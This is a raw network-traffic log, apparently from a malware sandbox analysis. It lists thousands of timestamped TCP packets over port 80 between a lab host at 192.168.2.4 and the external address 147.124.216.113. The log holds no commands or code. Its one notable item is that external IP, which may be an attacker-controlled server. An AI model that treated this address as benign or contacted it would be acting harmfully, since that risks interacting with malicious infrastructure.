                                                                                                                                                                        Jan 6, 2025 07:53:15.801613092 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801623106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801635981 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801733017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801743984 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801755905 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801765919 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801770926 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801778078 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801789045 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801793098 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801815987 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801835060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801846027 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801855087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801865101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801876068 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801898956 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.801928043 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801945925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.801975965 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839297056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839329958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839339972 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839356899 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839366913 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839376926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839385986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839423895 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839435101 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839442968 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839471102 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839513063 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839523077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839534044 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839545965 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839569092 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839569092 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839586020 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839596987 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839620113 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839772940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839782953 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839798927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839807987 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839812040 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839833021 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839838982 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839849949 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839875937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.839915991 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839926958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.839953899 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840580940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840601921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840611935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840635061 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840652943 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840682030 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840692997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840737104 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840751886 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840763092 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840773106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840781927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840787888 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840826988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840912104 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840926886 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840936899 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840946913 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840956926 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840960026 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.840967894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840977907 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840987921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.840987921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841005087 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841020107 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841068983 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841078997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841089010 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841099024 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841104984 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841135025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841192961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841207981 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841219902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841245890 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841285944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841296911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841305017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841315985 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841325045 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841351986 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841389894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841399908 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841409922 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841418982 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841428041 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841430902 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841445923 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841484070 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841619015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841674089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841711044 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841747046 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841758013 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841773033 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841782093 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841794968 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841815948 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.841818094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841830015 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841839075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.841872931 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.854453087 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887326002 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887352943 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887366056 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887373924 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887376070 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887387991 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887397051 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887428999 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887648106 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887681961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887691975 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887701988 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887717962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887718916 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887728930 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887741089 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887742043 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887772083 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887842894 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887852907 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887862921 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887872934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887887955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887891054 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887911081 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887911081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887938976 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.887943029 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.887980938 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888020992 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888036966 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888050079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888072968 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888073921 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888088942 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888099909 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888108969 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888109922 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888119936 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888134956 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888164997 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888258934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888269901 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888281107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888298988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888322115 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888333082 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888343096 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888386965 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888457060 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888468027 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888478994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888489962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888504028 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888535976 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888561964 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888572931 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888587952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888597965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888607979 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888607979 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888633966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888734102 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888753891 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888763905 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888773918 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888791084 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888798952 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.888802052 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888813972 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.888858080 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926047087 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926076889 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926088095 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926095009 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926105022 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926115990 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926126957 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926131010 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926147938 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926147938 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926162004 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926204920 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926206112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926245928 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926279068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926290035 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926301956 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926326036 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926331997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926343918 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926354885 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926373005 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926383972 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926387072 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926481962 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926523924 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926528931 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926541090 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926568031 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926589966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926597118 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926618099 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926628113 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.926635027 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.926664114 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927582026 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927593946 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927604914 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927615881 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927654028 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927655935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927668095 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927680016 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927705050 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927740097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927752018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927762032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927773952 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927800894 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927825928 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.927928925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927939892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927951097 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.927979946 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928054094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928070068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928081036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928092003 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928097010 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928111076 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928123951 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928150892 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928189993 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928294897 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928304911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928314924 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928328037 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928342104 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928356886 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928358078 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928371906 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928383112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928397894 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928423882 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928560019 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928570032 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928587914 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928600073 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928610086 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928621054 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928628922 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928647041 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928668022 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928698063 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928709984 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928720951 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928730965 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928745031 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928774118 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928814888 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928826094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928836107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928858995 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.928873062 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.928899050 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.929090023 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.929100990 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.929117918 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.929131985 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.929137945 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.929164886 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.949301958 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:15.974119902 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974147081 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974168062 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:15.974179029 CET8049739147.124.216.113192.168.2.4
